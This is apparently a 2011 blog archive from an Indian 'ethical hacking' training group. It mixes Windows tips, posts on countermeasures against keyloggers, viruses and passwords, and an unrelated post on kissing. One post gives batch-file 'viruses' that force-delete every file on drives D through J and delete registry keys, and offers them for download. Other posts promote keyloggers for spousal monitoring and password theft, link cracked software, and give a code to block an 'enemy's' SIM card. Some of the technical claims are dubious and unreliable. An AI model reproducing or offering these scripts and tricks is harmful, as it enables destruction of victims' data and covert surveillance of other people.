FRATERNiTY

Thursday 30 June 2011


                                        

                                             FRATERNiTY

                                     http://www.fraternityindia.in/



Introduction to FRATERNiTY


                 FRATERNiTY has centered its activities on the research and development of innovative products and services. We extend our educational services by conducting technical workshops and industrial training in various engineering colleges and schools to ignite the spirit of technological advancement in the radiant engineering youth of India.


FRATERNiTY Hackers Group focuses on advancing the Information Security and Ethical Hacking. The objectives of the company inter-alias include:
* Organize conferences, workshops and brainstorming sessions involving all concerned professionals, students and industry associations for the advancement of the Information Security and Ethical Hacking.

* Provide a forum for discussion on new changes, threats, loopholes and to provide suitable inputs to create Cyber Safe India.

* Promote and conduct live Hacking Sessions to show the real threats on India.

* Stimulate research and development.

* Organize a National Level Hacking Event Known As Hack-0-Finia.

* Bring out quality publications (Magazine for Hackers) for all levels of readership.

* Honor outstanding professionals.


Current Operations:

At the Present time the team of FRATERNiTY is working on the following Domains -

ETHICAL HACKING:- We are presently working on producing a able and efficient Cult of Hacker's which is being done under the workshop mode known as HACKER'S CULT. In which we are basically providing a Huge Back-End Support to the Leading Companies and organizations that are already dominant Players in this Sector. Apart from which we also a team which works for the awareness programs that are aimed at Igniting the spark between the different sections of education institutes and Collages. We are also Organizers of a National Level Hacking Event "HACK-0-FINIA" coming up in the near future. We also have different Projects running In Computer Institutes and Collages through Classroom module and AICTE.
IT SECURITY:- With the Formation of the Advanced Professional Hacking team ,we are also a key player in the IT Security domain. we have services like Network Security, Penetration Testing, Vulnerability Testing, Ethical Hackers.

WEB DEVELOPMENT:- Our Web development team consist of Certified Web Developers who have years of experience in this domain. We have been continuously dealing with many web development projects from Corporate houses.

SOFTWARE DEVELOPMENT:- We have partnered with some International Companies for the advancement in the field of S/W Development. At the present time our team is one of the leading back-end supporters for international S/W companies.

PROJECT TRAINING:- Having done a Considerable amount of work in such domains , we have also introduced a Training Program through which we aim at providing a Quality Training to enhancethe talent in the youth of India..

R & D:- We also have a well managed R&D dept. which acts as a backbone for our projects and constant advancement in the various fields. It is under the constant supervision of the Most Reputed Personalities in the industry.




Members of the Team

Name :                   Aditya Mukherjee
Current location:      Lucknow

Mr. Aditya Mukherjee (Managing Director & CTO, FRATERNiTY Technologies Pvt. Ltd.)
21 years of age, is a renowned Cyber Crime Expert & Ethical Hacker from India, Having proficiency in the fields of Ethical Hacking, Cyber Forensics & Cyber Crime Investigation. In a short span of time he has gained reputation among the well known Cyber Crime Experts from the country. Apart from being involved in solving Cyber Crime cases he has also conducted a huge number of Workshops and Corporate training sessions on a wide range of topics concerting Information Security.


Name :                   Prasoon Nigam
Current Location:    Lucknow

Mr.Prasoon Nigam (CEH (certified Ethical hacker) and Assistant Director in FRATERNiTY Technologies Pvt. Ltd.)
Enrich knowledge in ethical hacking. Worked as Licensed Penetration tester. Have taught many students giving workshops in colleges and schools.

Change the icons of your drive vd ur image

Tuesday 28 June 2011


Change the icons of your drive ( C: D: E: AND ALL THE OTHER DRIVEs)

OR

Put your image in replace of hard disk icon

here what you do.. just download the image from any where

download "any to icon" software ::: Download =>   any2icon software 

convert the image to icon with the help the above software

in the same way convert your image (photo) into the icon with the any2icon software

now put icon image in the hard disk whom you want to change the icon....

now open the notepad
type the following code

[autorun]
icon="name of the icon file".ico  :::::;  put the name of the icon file for example icon name file is prasoon ... no put the name as prasoon.ico without quotes

now save as autorun.inf in same drive where you have stored the icon image

    
here download the sample open the rar file copy both the file paste in to your pen drive or USB

remove and re enter the pen drive or the usb   ::  Download=>  sample (click here)


HERE IS THE VIDEO :::     Video tutorial

Countermeasures for keyloggers

Sunday 26 June 2011


What is keyloggers ?

* A keylogger is program or a software or hardware that records the real time activity of a computer user  including the keyboard keys they press

* keyloggers used to monitor the network usage of people for their own computer without  their direct knowledge.

* Keyloggers allow not only keyboard keystrokes to be captured but also capable of collecting screen shots from the computer

In simple meaning::

whatever you type by pressing a key on the keyboards are captured by keylogger even the screen shots with the time you select.

How keyloggers are used for hacking?

It is very simple just install the keylogger in the system you want to monitor or want to hack the passwords .
anyone types the on the keyboard is captured  by keylogger and after words you may takeout or open it and find the all things happen in that computer::


Keylogger software’s allows you to find out what other users do on your computer in your absence. Key logger invisibly records keystrokes of every user activity performed on the computer in encrypted log files with option to send the details at specified email id. Best PC monitoring tool automatically records all typed emails conversation, chat records, passwords documents lists


USE OF KEYLOGGERS

1) School/Institutions 
2) Spousal Monitoring
3) Personal Control and File Backup
4) Parental Control
5) Totally User Friendly
6) Business Administration

Name of Best keyloggers

1) Ardamax.Keyloggers Download => Ardamax keylogger
2) Perfect Keylogger Download => Perfect keylogger + serial key 
3) KGB Keylogger    Download => KGB keylogger + serial key
4) Spectro Pro Download => Spectro Pro Dwonload
5) Sniper spy Download =>Sniper Spy download
6) Winspy Download => Winspy Download


Countermeasures for keyloggers

Use anti keylogger

What is anti keyloggers

     Anti keyloggers are the powerful tool that prohibits operation of keyloggers , know or unknown, once installed, anti keyloggers shield will run silently in your system

Name of best anti keyloggers

Antispyware Plus Download => Antispyware + serial + crack

Anti keylogger Download => anti keylogger + serial + crack

the best to way to protect from keylogger is to use quick heal antivirus and spyware doctor antivirus

Quick Heal antivirus  Download => Quick heal antivirus + crack + serial key

Spyware doctor antivirus Download => spyware doctor + serial key + crack

how to make a folder without name & hidden folder without hiding it

Thursday 23 June 2011


how to make a folder without name & a hidden folder without hiding it


Here the trick goes like this

Open or create a new folder go  to rename option now type press alt + 0160  !! wola here the folder is created without name 


Here is the trick for the making invisible folder

Open or create a new folder go  to rename option now type press alt + 0160  !! wola here the folder is created without name

after this right click on the folder go to properties -> customize -> change icon

scroll right you will find blank space folder click apply ok

here you go a hidden folder created ::::

CounterMeasures for IP ADDRESS

Monday 20 June 2011

What is an IP Address ::   An Internet Protocol address (IP address) is a numerical label assigned to each device (e.g., computer, printer) participating in a computer network that uses the Internet Protocol for communication.


Since these numbers are usually assigned to internet service providers within region-based blocks, an IP address can often be used to identify the region or country from which a computer is connecting to the Internet. An IP address can sometimes be used to show the user's general location.

ok let get to know the ip address in a layman and very simple way ::

IP address is like a phone no. or the house no. When you have to talk to person you dial his no. in same way when you connect to internet you get a no., from which people connects to you and talk to you that no. which connect to you in internet is known as IP address.

If a person what to share a book, he takes your address now that address is know as your identity in same way is person want to share something about on internet then it uses your IP address .

In the world of internet, ip address is your identification


HOW IP ADDRESS HELPS IN HACKING

1) It helps to connect to your computer and then helps in entering in to your computer

2) If person knows your ip address then remote shutdown (means your computer can be shutdown) by the person

3) Virus can be uploaded to your computer and you will not get to know

4) Sensitive data can be hacked and can to be transferred form your computer to another or person itself

5) Blues Port Scanner – This program will scan the IP address that you chose and identify open ports that are on the target box.

6) Your ip address can be used for ip spoofing and with your ip hacking can be made and when ip is trace you will  be the witness or theaf


HOW TO KNOW YOUR IP ADDRESS

1) Open your run command (by pressing window key + r) then type cmd

                       a command prompt window will open and type ipconfig (press enter)

2) Or go to this website :: http://whatismyipaddress.com/


How to Protect your IP address

The most common method to protect your IP address is to use a proxy server in one form or another.


WHAT IS PROXY SERVER

A proxy server is a computer that offers a computer network service to allow clients to make indirect network connections to other network services. A client connects to the proxy server and then requests a connection, file, or other resource available on a different server. The proxy provides the resource either by connecting to the specified server or by serving it from a cache. In some cases, the proxy may alter the client's request or the server's response for various purposes.

Basically proxy server is masking or hiding your identity behind the fake id

To keep machines behind it anonymous (mainly for security)



Software or uses proxy servers to Protect your IP address ::

Ultrasurf is the software which protects your ip and even provide you proxy server

Hide IP Platinum Next Gene v1.52 Download => Hide IP Platinum crack + serial key

super hide ip download => Super hide ip crack + serial key

There Some proxy servers that helps to protect your ip address ::

1) http://www.bestproxysites.com/

2) http://www.proxysites.com

3) http://newipnow.com/

4)http://www.antiwebfilter.com/web-proxies/      good one

5) http://surfmo.com/

There are many more just ask the google baba........

SHUTDOWN and RESTART your computer in 5 different ways

Sunday 19 June 2011


Notepad trick to shutdown your computer in many ways rather then just clicking on turn off ::

 These all tricks are well working on window xp

          Details of the code of shutdown
          =     -s is for the shutdown 
          =     -r is for the restart
          =     -l is for the log off
          =     -t is for the time
          =      00 is time you can put in seconds for example 60 second for 1 minute or 120 for the 2 minute 

1) shutdown your computer with batch file coding

here is the code

@echo off
shutdown -s -t 00

write down the code on notepad and save it as kinng.bat

or download the batch file =>  batch file for shutdown
                                                 batch file for restart


2)shutdown your computer with an exe (executable) file.

second or right click on the desktop go to new select shortcut

    a window will open type at the blank space shutdown -s -t 00 click next and again click on finish and here the exe file of shortcut is ready

download the exe file =>  exe file shutdown
                                         exe file restart

3) shutdown your computer from run command

open run command press windows key+ R

  type the command shutdown -s -t 00  for shutdown
                             shutdown -r -t 00   for restart

NOTE: keep in mind that every space is important, if you miss any thing the code will not work

4) Shutdown your computer at a particular time

    open the run command (windows key + r)

     type the following code

                at 9:23AM shutdown -s -t 05
                at 9:24PM shutdown -s -t 05
                at 9:24PM shutdown -s

NOTE : After "at" you can put any particular time you want to shutdown the computer

5) here is most interesting trick :: shutdown you computer in 5 seconds

   just open you task manager (ctrl+alt+delete) now go to shutdown menu
     
             select turn off option

            now do like this press ctrl + then click on turn off and count 5 4 3 2 1 here shutdown


HIBERNATE YOUR COMPUTER AT ONE CLICK ::

Download the file => exe file of hibernate

But first you have to enable the hibernate :: go to control panel then to power option and then to the hibernate option check the enable hibernate then click ok here you go


you may hibernate buy opening the shutdown window press ctrl button the stand by will change to hibernate

HOW TO MAKE VIRUS AND TRICKS WITH NOTEPAD

Friday 17 June 2011


Here you find all the notepad tricks SEARCHED BY ME ALL OVER ::

USE EVERY TRICK FOR ETHICAL USE ONLY

Just open your notepad

1) Click start -> all programs -> accessories -> notepad

2) Or just press or click windows key + r :: run window will open and type notepad and hit enter .

***********************
Make BACKDOOR HELP of BACKTRACK TERMINAL => Click on me :))
Hack Wifi => Click on me :)
Crack hash passwords => Click on me :)
Keep safe ur wifi from being hacked => 1_Click on me:)
                                                                      2_Click on me:)
**************************************

NOW  TYPE THE FOLLOWING CODE ::

@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q

then save it as kinng.bat and the batch file is created .

WARNING :: This is the most dangerous virus 


Make it or download the file from here -> batch file virus  

******************
NMAP TUTORIAL Backtrack => Click on me :)
Different ways to DOS ATTACKS => Click on me :)
Fun with Konsole or Terminal => Click on me :)
**********************************

Delete the entire registry

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*

now save it as kinng.bat and the batch file is created .

Make it or download the file from here ->   batch file virus


Now here is most dangerous virus that can blast or corrupt your computer after using this you will not able to use your computer this will be the last time you will be using it

download here ->  most dangerous batch file

©Pprasoon nigam
********************
METASPLOIT basics =>  Metasploit Basics Click on me :)
Know how metasploit meterpreter Woks => learn meterpreter
Use NMAP in metasploit => NMAP in METASPLOIT click on me :)
G-mail two way verification => Click on me :)
Bluetooth shocking Trick => Click on me :)
****************************************

*********************(~_^)********************
Hack WIFI with the help of GUI version in Backtrack => Click on me :))

CounterMeasures for notepad virus and .bat virus

Wednesday 15 June 2011


What is notepad?

Notepad is not only a common text editor, typically saved with .txt

NOTEPAD IS USED FOR MANY USEFUL THINGS::

Here's The Secret

USES OF NOTEPAD::

           To make notes with .txt extension
           To make undetectable virus with .bat extension
           To make registry file with .reg extension
           To make some small utility programs with .vbs extension
           To make normal HTML page with .HTML extension
           To create program
           To use notepad as TEXT RE-PLACER
           To use notepad as creative designer tool


The default extension for the notepad is .txt with which you save a file.

Counter measures

when ever you find a program having an extension of

.bat
.vbs
.html
or more

Always second or right click on that file then select open with notepad and you got know what type of program is it containing, it may be virus or a simple program

Countermeasures for System hacking

Thursday 9 June 2011

CRACKING PASSWORDS 

Types of passwords :

                   Password that contain only letters :: HJKL
                   Password that contain only numbers :: 2545
                   Password that contain only special characters :: $#%^
                   Password that contain letters and numbers :: jdsh563
                   Password that contain only letters and special characters :: js$#ZD
                   Password that contain only special characters :: ^#%456$
                   Password that contain letters special characters and numbers :: E$f$56

There four types of password attacks ::
                       

  •  Passive online attacks
  •  Active online attacks
  •  Offline attacks      
  •  Non-electronic attacks

Passive online attack :

 Wire Sniffing

  •  Access and record the raw network traffic
  •  Wait until the authentication sequence
  •   Brute force credentials

Man in the middle

  •   Somehow get access to the communications channel
  •   Wait until the authentication sequence
  •    No need to brute force


Active online attack ::

Password Guessing

  •  Try different password until one works
  •  Bad password
  •  Open authentication points

Offline attacks ::

  •  Offline attacks are time
  •  Web services are available
  •   Distributed password cracking techniques are available
                   

Tools for Attacks ::


                             NAT ::  NetBIOS Auditing TOOL
                             BFT ::  Brute Force Tool
                                     ::  KerbCrack


Password Sniffing ::

  • Password guessing is a tough task
  • If an attacker is able to eavesdrop on NT/2000 logins, then this approach can spare lot of random guesswork

Password Cracking Tools::
                    

  •   Access PassView
  •   Crack
  •   LCP
  •   Keyloggers


Countermeasures for Password Hacking

How to keep STRONG PASSWORD :: Try to use full keyboard means use alphabets, numbers and characters :: Use capital letters too :: for example P.r.#.a.S.O.$.o.n

Changer your password :: Change your password every after 10 days of 15 days :: This will more good for you to be safe and try to keep strong password ::

Use different passwords for different accounts. Everybody knows this but nobody cares to follow this. I know remembering a dozen cryptic passwords is very difficult but still I will suggest you to use different passwords for the accounts having sensitive informations.

Check your Security Question. Usually people keep some cryptic password but their security question is too simple to guess. For example, many people keep the security question as the name of their pet or first school

Threats and Countermeasures 

Threat                          Countermeasures

Spoofing user identity             Use strong authentication.

                                              Do not store secrets (for example, passwords) in plaintext.
  
                                              Do not pass credentials in plaintext over the wire.

                                              Protect authentication cookies with Secure Sockets Layer (SSL).

Tampering with data                Use data hashing and signing.

                                               Use digital signatures.

                                               Use strong authorization.

                                               Use tamper-resistant protocols across communication links.

                                               Secure communication links with protocols that provide message integrity.

Repudiation                             Create secure audit trails.

                                                Use digital signatures.

Information disclosure              Use strong authorization.

                                                Use strong encryption.

                                          Secure communication links with protocols that provide message confidentiality.

                                          Do not store secrets (for example, passwords) in plaintext.

Types of Viruses

Types of viruses :-
The different types of viruses are as follows-

1) Boot Sector Virus :- Boot sector viruses infect either the master boot record of the hard disk or the floppy drive. The boot record program responsible for the booting of operating system is replaced by the virus. The virus either copies the master boot program to another part of the hard disk or overwrites it. They infect a computer when it boots up or when it accesses the infected floppy disk in the floppy drive. i.e. Once a system is infected with a boot-sector virus, any non-write-protected disk accessed by this system will become infected.

Examples of boot- sector viruses are Michelangelo and Stoned.

2) File or Program Viruses :- Some files/programs, when executed, load the virus in the memory and perform predefined functions to infect the system. They infect program files with extensions like .EXE, .COM, .BIN, .DRV and .SYS .

Some common file viruses are Sunday, Cascade.

3) Multipartite Viruses :- A multipartite virus is a computer virus that infects multiple different target platforms, and remains recursively infective in each target. It attempts to attack both the boot sector and the executable, or programs, files at the same time. When the virus attaches to the boot sector, it will in turn affect the system’s files, and when the virus attaches to the files, it will in turn infect the boot sector.
This type of virus can re-infect a system over and over again if all parts of the virus are not eradicated.

Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989.
Other examples are Invader, Flip, etc.

4) Stealth Viruses :- These viruses are stealthy in nature means it uses various methods for hiding themselves to avoid detection. They sometimes remove themselves from the memory temporarily to avoid detection by antivirus. They are somewhat difficult to detect. When an antivirus program tries to detect the virus, the stealth virus feeds the antivirus program a clean image of the file or boot sector.

5) Polymorphic Viruses :- Polymorphic viruses have the ability to mutate implying that they change the viral code known as the signature each time they spread or infect. Thus an antivirus program which is scanning for specific virus codes unable to detect it's presense.

6) Macro Viruses :- A macro virus is a computer virus that "infects" a Microsoft Word or similar application and causes a sequence of actions to be performed automatically when the application is started or something else triggers it. Macro viruses tend to be surprising but relatively harmless.A macro virus is often spread as an e-mail virus. Well-known examples are Concept Virus and Melissa Worm.

Calculations On Command Prompt

Calculations On Command Prompt

the command processor CMD.EXE comes with a mini-calculator that can perform simple arithmetic on 32-bit signed integers:

C:\>set /a 2+2
4
C:\>set /a 2*(9/2)
8
C:\>set /a (2*9)/2
9
C:\>set /a "31>>2"
7

Note that we had to quote the shift operator since it would otherwise be misinterpreted as a "redirect stdout and append" operator.

For more information, type set /? at the command prompt.

Different Error Codes

Sometime you are browsing the internet and trying to open any website, your e-mail and any FTP sites ,but you see different error codes there. You should be familiar with these error codes. You can solve these problems if you are well-known with the meaning of error codes.

400 = This is bad request error, First check you may be typing wrong URL name and server could not understand your request.

401 = You are trying to open any unauthorized access site or page. Check your username and password if you are trying to open any webpage.

402 = Payment Required Error

403 = You are trying to open any forbidden page and you are blocked by that domain.

404 = Here you are trying to open the webpage that was removed or re-named, also check the URL spelling.

408 = This is time out error. you should send the request with in time that the server set for you.

10 reasons why PCs crash U must Know

Wednesday 8 June 2011

10 reasons why PCs crash U must Know

Fatal error: the system has become unstable or is busy," it says. "Enter to return to Windows or press Control-Alt-Delete to restart your computer. If you do this you will lose any unsaved information in all open applications."

You have just been struck by the Blue Screen of Death. Anyone who uses Mcft Windows will be familiar with this. What can you do? More importantly, how can you prevent it happening?

 Hardware conflict

The number one reason why Windows crashes is hardware conflict. Each hardware device communicates to other devices through an interrupt request channel (IRQ). These are supposed to be unique for each device.

For example, a printer usually connects internally on IRQ 7. The keyboard usually uses IRQ 1 and the floppy disk drive IRQ 6. Each device will try to hog a single IRQ for itself.

If there are a lot of devices, or if they are not installed properly, two of them may end up sharing the same IRQ number. When the user tries to use both devices at the same time, a crash can happen. The way to check if your computer has a hardware conflict is through the following route:

* Start-Settings-Control Panel-System-Device Manager.

Often if a device has a problem a yellow '!' appears next to its description in the Device Manager. Highlight Computer (in the Device Manager) and press Properties to see the IRQ numbers used by your computer. If the IRQ number appears twice, two devices may be using it.

Sometimes a device might share an IRQ with something described as 'IRQ holder for PCI steering'. This can be ignored. The best way to fix this problem is to remove the problem device and reinstall it.

Sometimes you may have to find more recent drivers on the internet to make the device function properly. A good resource is www.driverguide.com. If the device is a soundcard, or a modem, it can often be fixed by moving it to a different slot on the motherboard (be careful about opening your computer, as you may void the warranty).

When working inside a computer you should switch it off, unplug the mains lead and touch an unpainted metal surface to discharge any static electricity.

To be fair to Mcft, the problem with IRQ numbers is not of its making. It is a legacy problem going back to the first PC designs using the IBM 8086 chip. Initially there were only eight IRQs. Today there are 16 IRQs in a PC. It is easy to run out of them. There are plans to increase the number of IRQs in future designs.

 Bad Ram

Ram (random-access memory) problems might bring on the blue screen of death with a message saying Fatal Exception Error. A fatal error indicates a serious hardware problem. Sometimes it may mean a part is damaged and will need replacing.

But a fatal error caused by Ram might be caused by a mismatch of chips. For example, mixing 70-nanosecond (70ns) Ram with 60ns Ram will usually force the computer to run all the Ram at the slower speed. This will often crash the machine if the Ram is overworked.

One way around this problem is to enter the BIOS settings and increase the wait state of the Ram. This can make it more stable. Another way to troubleshoot a suspected Ram problem is to rearrange the Ram chips on the motherboard, or take some of them out. Then try to repeat the circumstances that caused the crash. When handling Ram try not to touch the gold connections, as they can be easily damaged.

Parity error messages also refer to Ram. Modern Ram chips are either parity (ECC) or non parity (non-ECC). It is best not to mix the two types, as this can be a cause of trouble.

EMM386 error messages refer to memory problems but may not be connected to bad Ram. This may be due to free memory problems often linked to old Dos-based programmes.

BIOS settings

Every motherboard is supplied with a range of chipset settings that are decided in the factory. A common way to access these settings is to press the F2 or delete button during the first few seconds of a boot-up.

Once inside the BIOS, great care should be taken. It is a good idea to write down on a piece of paper all the settings that appear on the screen. That way, if you change something and the computer becomes more unstable, you will know what settings to revert to.

A common BIOS error concerns the CAS latency. This refers to the Ram. Older EDO (extended data out) Ram has a CAS latency of 3. Newer SDRam has a CAS latency of 2. Setting the wrong figure can cause the Ram to lock up and freeze the computer's display.

Mcft Windows is better at allocating IRQ numbers than any BIOS. If possible set the IRQ numbers to Auto in the BIOS. This will allow Windows to allocate the IRQ numbers (make sure the BIOS setting for Plug and Play OS is switched to 'yes' to allow Windows to do this.).

 Hard disk drives

After a few weeks, the information on a hard disk drive starts to become piecemeal or fragmented. It is a good idea to defragment the hard disk every week or so, to prevent the disk from causing a screen freeze. Go to

* Start-Programs-Accessories-System Tools-Disk Defragmenter

This will start the procedure. You will be unable to write data to the hard drive (to save it) while the disk is defragmenting, so it is a good idea to schedule the procedure for a period of inactivity using the Task Scheduler.

The Task Scheduler should be one of the small icons on the bottom right of the Windows opening page (the desktop).

Some lockups and screen freezes caused by hard disk problems can be solved by reducing the read-ahead optimisation. This can be adjusted by going to

* Start-Settings-Control Panel-System Icon-Performance-File System-Hard Disk.

Hard disks will slow down and crash if they are too full. Do some housekeeping on your hard drive every few months and free some space on it. Open the Windows folder on the C drive and find the Temporary Internet Files folder. Deleting the contents (not the folder) can free a lot of space.

Empty the Recycle Bin every week to free more space. Hard disk drives should be scanned every week for errors or bad sectors. Go to

* Start-Programs-Accessories-System Tools-ScanDisk

Otherwise assign the Task Scheduler to perform this operation at night when the computer is not in use.

Fatal OE exceptions and VXD errors

Fatal OE exception errors and VXD errors are often caused by video card problems.

These can often be resolved easily by reducing the resolution of the video display. Go to

* Start-Settings-Control Panel-Display-Settings

Here you should slide the screen area bar to the left. Take a look at the colour settings on the left of that window. For most desktops, high colour 16-bit depth is adequate.

If the screen freezes or you experience system lockups it might be due to the video card. Make sure it does not have a hardware conflict. Go to

* Start-Settings-Control Panel-System-Device Manager

Here, select the + beside Display Adapter. A line of text describing your video card should appear. Select it (make it blue) and press properties. Then select Resources and select each line in the window. Look for a message that says No Conflicts.

If you have video card hardware conflict, you will see it here. Be careful at this point and make a note of everything you do in case you make things worse.

The way to resolve a hardware conflict is to uncheck the Use Automatic Settings box and hit the Change Settings button. You are searching for a setting that will display a No Conflicts message.

Another useful way to resolve video problems is to go to

* Start-Settings-Control Panel-System-Performance-Graphics

Here you should move the Hardware Acceleration slider to the left. As ever, the most common cause of problems relating to graphics cards is old or faulty drivers (a driver is a small piece of software used by a computer to communicate with a device).

Look up your video card's manufacturer on the internet and search for the most recent drivers for it.

Viruses

Often the first sign of a virus infection is instability. Some viruses erase the boot sector of a hard drive, making it impossible to start. This is why it is a good idea to create a Windows start-up disk. Go to

* Start-Settings-Control Panel-Add/Remove Programs

Here, look for the Start Up Disk tab. Virus protection requires constant vigilance.

A virus scanner requires a list of virus signatures in order to be able to identify viruses. These signatures are stored in a DAT file. DAT files should be updated weekly from the website of your antivirus software manufacturer.

An excellent antivirus programme is McAfee VirusScan by Network Associates ( www.nai.com). Another is Norton AntiVirus 2000, made by Symantec ( www.symantec.com).

Printers

The action of sending a document to print creates a bigger file, often called a postscript file.

Printers have only a small amount of memory, called a buffer. This can be easily overloaded. Printing a document also uses a considerable amount of CPU power. This will also slow down the computer's performance.

If the printer is trying to print unusual characters, these might not be recognised, and can crash the computer. Sometimes printers will not recover from a crash because of confusion in the buffer. A good way to clear the buffer is to unplug the printer for ten seconds. Booting up from a powerless state, also called a cold boot, will restore the printer's default settings and you may be able to carry on.

8 Software

A common cause of computer crash is faulty or badly-installed software. Often the problem can be cured by uninstalling the software and then reinstalling it. Use Norton Uninstall or Uninstall Shield to remove an application from your system properly. This will also remove references to the programme in the System Registry and leaves the way clear for a completely fresh copy.

The System Registry can be corrupted by old references to obsolete software that you thought was uninstalled. Use Reg Cleaner  to clean up the System Registry and remove obsolete entries. It works on Windows 95, Windows 98, Windows 98 SE (Second Edition), Windows Millennium Edition (ME), NT4 and Windows 2000.

Read the instructions and use it carefully so you don't do permanent damage to the Registry. If the Registry is damaged you will have to reinstall your operating system.
Often a Windows problem can be resolved by entering Safe Mode. This can be done during start-up. When you see the message "Starting Windows" press F4. This should take you into Safe Mode.

Safe Mode loads a minimum of drivers. It allows you to find and fix problems that prevent Windows from loading properly.

Sometimes installing Windows is difficult because of unsuitable BIOS settings. If you keep getting SUWIN error messages (Windows setup) during the Windows installation, then try entering the BIOS and disabling the CPU internal cache. Try to disable the Level 2 (L2) cache if that doesn't work.

Remember to restore all the BIOS settings back to their former settings following installation.

Overheating

Central processing units (CPUs) are usually equipped with fans to keep them cool. If the fan fails or if the CPU gets old it may start to overheat and generate a particular kind of error called a kernel error. This is a common problem in chips that have been overclocked to operate at higher speeds than they are supposed to.

One remedy is to get a bigger better fan and install it on top of the CPU. Specialist cooling fans/heatsinks are available from www.computernerd.com or www.coolit.com

CPU problems can often be fixed by disabling the CPU internal cache in the BIOS. This will make the machine run more slowly, but it should also be more stable.

Power supply problems

With all the new construction going on around the country the steady supply of electricity has become disrupted. A power surge or spike can crash a computer as easily as a power cut.

If this has become a nuisance for you then consider buying a uninterrupted power supply (UPS). This will give you a clean power supply when there is electricity, and it will give you a few minutes to perform a controlled shutdown in case of a power cut.

It is a good investment if your data are critical, because a power cut will cause any unsaved data to be lost.

Format drive with cmd

format drive with cmd

* Goto Start => Run.   

* Type Cmd & press Enter.    

* Type the following command line 

Format/x G:

Mouse wheel tricks

Mouse wheel tricks
If you have a mouse with a scroll wheel on it, you can do some cool tricks.......


1.Shift & Spin ::

What happens when you hold down the Shift key on a web page and spin the wheel on your wheel mouse? Explorer goes either back or forward, depending on which direction you spin.
Give it a try. Open up Internet Explorer(or any other browser) and follow a few links. Then, hold down your SHIFT key and spin that wheel.


2.CTRL & Spin ::

If you are in a web browser (Explorer or Netscape or Firefox) , hold down your Ctrl key and spin the wheel. It makes the text larger or smaller depending on which way you spin. For Opera users, it magnifies both the images and the text.

How to disable Low Disk Space Warning in Windows?

Though this is balloon pop up is good to indicate the hard disk space when nearing to end up but some of us don’t like the way it comes. And most of the time tools provided to restore the Harddisk Space are not be suited enough and this cause  a lot  to find a solution on how to disable it so simply follow the instruction below:

First of All open Registry Editor (Start > Run > and type regedit).

    * Make a back up of the registry.
    * Go the key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

    * Right click in the right part of the window and select New and scroll to DWORD value.
    * Name the value as NoLowDiskSpaceChecks

    * Put 1 in the data field.
    * From there it should be OK.

From Now on no pop up of low disk space can annoy you and if once again you would like to have this utility on Just change the NoLowDiskSpaceChecks DWORD value to 0.

The First Kiss

A first kiss is always special, and usually scary. However, with the right strategy, your first kiss can be worthwhile and fulfilling. The biggest thing that you can do to blow a first kiss is to try to kiss them too soon! This might be scary to hear because you'll ask yourself, "What if it's still too soon?" all the time. But you want to make sure that you're not trying to kiss them before you've even held hands or known each other for a while. You don't want to kiss them too soon for two reasons:
1.    You don't want them to think you're more interested in kissing than you are interested in them.
2.    You don't want them to think you like them a ton more than they like you, or they'll get scared

If they reciprocate your other physical gestures, such as holding hands, putting your arm around them, etc., then you can kiss them. However, don't kiss them immediately after you hold hands the first time! Do those other things for a few days to let the tension build until they are dying for you to kiss them!
The second biggest way you can blow a first kiss is to wait forever and miss too many opportunities. While it's good to let them wonder when you're going to do it (you want them to know you have confidence and are in control of yourself and the situation), if you wait for weeks and weeks and pass up too many opportunities, they're just going to move on.
Another thing: don't talk about it before you do it! Nothing ruins romance more than talking it to death before it happens! Let the attraction build, be calm and confident, and just kiss them when the moment presents itself. You don't have to put on a big production or arrange some fancy or romantic date or event in order to kiss them. Kiss them for the first time when you are by yourselves--spontaneously!
One more thing! Don't buy their affection! Don't think that you can take a girl out to dinner and she owes you a kiss. Girls see through that and it doesn't work! Girls, don't think you can get a guy to kiss you or be interested in you by buying them things or bringing them cookies. It's not like that!

Kissing Do's and Don'ts

Do's:
•    Breathe! Breathe through your nose or don't be afraid to pull back slightly to take a breath, but no one likes it when their partner violently gasps because they've been holding their breath!
•    Have fresh breath!
•    Reciprocate their kissing and be active. You don't want to be a kissing post, you want to be a kisser!
•    Be gentle, not violent!
•    Use your hands.
•    Pay attention to your partner. Kissing is not all about you--it's about making them feel good too!

Don'ts:
•    Use too much tongue or a really stiff tongue. This can be a turn off. Try to be subtle and gentle. The slower the hotter!
•    Lick their teeth. Yuck.
•    Kiss with your eyes open. It's ok to peek once in a while, but keep em closed or you'll come off as creepy!
•    Salivate everywhere. Slobbery kissing is not cool. Just be conscious of it, and you'll do fine.
•    Move too fast. Stay in control of yourself and don't freak them out by getting too frisky!

Reveal *****(Asterisk) Passwords Using Javascript

Tuesday 7 June 2011

-: Reveal *****(Asterisk) Passwords Using JavaScript :-

Want to Reveal the Passwords Hidden Behind Asterisk (****) ?

Follow the steps given below-

1) Open the Login Page of any website. (eg. http://mail.yahoo.com)

2) Type your 'Username' and 'Password'.

3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.

javascript: alert(document.getElementById('Passwd').value);


4) As soon as you press 'Enter', A window pops up showing Password typed by you..!

HOW TO BLOCK YOUR ENEMY'S SIM CARD

HOW TO BLOCK YOUR ENEMY'S SIM CARD ....      

Here  a simple trick for block your enemy sim card,Blocking a sim card is too simple.What you have to do is just enter the below code in the desired phone
**04*3814*7529*68243#
Entering of above code will ask you to enter the PUK code.To solve this issue just call customer care and get your PUK code.
Note:Entering of invalid PUK will cause permanent blocking of your SIM

CounterMeasures for Virus and Worms attack


VIRUS :: Computer virus are perceived as a threat to both business and personnel
                            Virus is a self replicating program that produces its own code by attaching copies itself into other executable codes

SOME VIRUS NAMES ARE ::
                                                               Melissa Brew & Back orifice
                                                               Melissa, Corner, Tristate
                                                               Slammer, Sobig
                                                               Email-Worm, win32, I love you virus

WHY VIRUS ARE CREATED ::
  • Research projects 
  •  Pranks 
  •  Vandalism 
  •  To attack the product of specifies companied 
  •  To distribute the political messages 
  •  Financial gain 
  •  Identity theft 
  •  Spyware

WORMS :: Worms are distinguished from virus by the fact that a virus requires some from of the human intervention to infect a computer whereas a worm does not
                                     A worm is a special type of virus that can replicate itself and use memory, but cannot attach itself to other programs

INDICATIONS OF VIRUS ATTACK ::
  • Programs take longer to load than normal 
